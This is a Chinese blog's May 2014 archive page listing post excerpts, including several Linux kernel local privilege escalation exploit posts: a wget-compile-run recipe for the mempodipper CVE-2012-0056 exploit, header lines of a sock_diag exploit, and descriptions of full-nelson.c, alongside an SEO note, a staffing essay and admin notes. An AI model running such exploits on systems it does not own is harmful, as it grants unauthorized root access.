2014年05月的文章

针对临时关站seo,5月30日百度站长平台新增临时闭站功能

网站出技术问题或者被攻击了,要临时关闭搞搞整顿;最近风声紧,网站暂停营业观望一下;备案必须关网站……用户无法访问了,我好怕被百度当死链永远删掉 ——这时抓取频次工具新功能闭站保护就派上用场了!暂时让站点在百度中消失,待尘埃落定,第一时间使用抓取频次工具通知百度,百度以最快速度将恢复网站展 现,流量妥儿妥儿地!

除了保护临时关闭的站点需要使用抓取频次工具,它还能做什么呢:

【我的网站天天更新,可是收录量一直上不去,Baiduspider到底有没有来?】
       使用抓取频次工具看看Baiduspider的到访次数记录吧,工具可以提供最近一个月的Baiduspider天级抓取量趋势图。

» 阅读全文

关键词: 百度站长平台 , seo

Linux kernel <= v3.15-rc4 本地提权Exploit:cve-2014-0196-md.c 已测

这篇日志被加密了,请输入密码后查看。

Linux 2.6.39 到 3.2.0 内核爆本地提权漏洞exp代码

linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。

 

重现方法:

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

cc mempodipper.c

./a.out

 

在执行完毕后运行 whoami 来看是否执行成功。

» 阅读全文

关键词: 漏洞exp , 本地提权 , linux

Ubuntu 12.10 64-Bit sock_diag_handlers本地提权Exploit

ubuntu 12.10 64-Bit sock_diag_handlers本地提权exploit。代码具有攻击性,请用于测试和研究,否则后果自负

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>

» 阅读全文

关键词: exploit , 本地提权 , ubuntu

full-nelson.c代码:Ubuntu(Linux Kernel <= 2.6.37) Econet 协议的本地提权exp代码

程序利用了 Linux Econet 协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升,也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell

update 过的 Ubuntu 10.04 Server LTS 上测试通过:

uname -r
2.6.32-21-server

测试:

2.6.35-22-generic也通过。

代码具有攻击性,攻击他人网站自重。

» 阅读全文

关键词: 本地提权 , full-nelson.c , exp代码

Centos/CentOS 6.4 linux内核2.6.3.2本地提权exp代码

最近我接手的一台服务器centos 的,被黑客攻击,直接获取到root权限,牛逼,通过分析,大约是通过

mysql+exp提权获得root权限。下面分享下。

具体大家可以去测试。代码具有非常强的攻击性,请用于安全测试,否则后果自担。

» 阅读全文

关键词: exp代码 , linux内核提权 , centos

互联网公司员工(人才),留得住是因为本身就留得住;留不住的,你永远留不住

记得以前看过自媒体人罗振宇做过一挡节目,推荐了一本书叫做《不死的中国人》,一直没看过这本书,这几天闲着无聊就买来看了一看,不看不知道,看了果然颇有感触,因此今天我们来简单解读一下这部书的主题思想,同时来结合这本书来谈谈今天的话题“为何小公司招不到人”。

都是我个人的歪谈和歪理,错误之处在所难免。

一、谈书

《不死的中国人》作者是意大利人,这本书也是写给意大利人看的。书中描绘的现象如下,因为限于篇幅因此我用“罗列文风”表达,希望能缩短大家对本书的了解时间,如果大家对此有兴趣,可以去看看这本书,还是很有启示性的:

» 阅读全文

关键词: 人才

Linux常用系统运维命令使用(详细笔记版)

登录和退出Linux 系统

用户登录系统时 ,为了使系统能够识别自己必须输入用户名和密码经系统验证无误后方能进入系统。

说明:
在系统安装过程中可以创建两种帐号: 超级用户帐号和普通用户帐号,Linux使用者一般为普通用户,而系统管理员一般使用超级用户帐号完成一些系统管理的工作.如果只需要完成一些由普通用户帐号就能完成的任务,建议不要使用超级用户帐号以免无意中破坏系统。

用户登录分两步进行 ,第一步输入用户的登录名,系统根据该登录名来识别用户;第二步输入用户的口令该口令是用户自己选择的一个字符串,对其他用户是保密的,是在登录时系统用来辨别真假用户的关键字。

1. 启动和登录系统
超级用户的用户名为 root, 密码在安装系统时已设定,系统启动成功后屏幕显示下面的提示:

localhost login:

» 阅读全文

关键词: 系统运维

Total: 45123456Next ›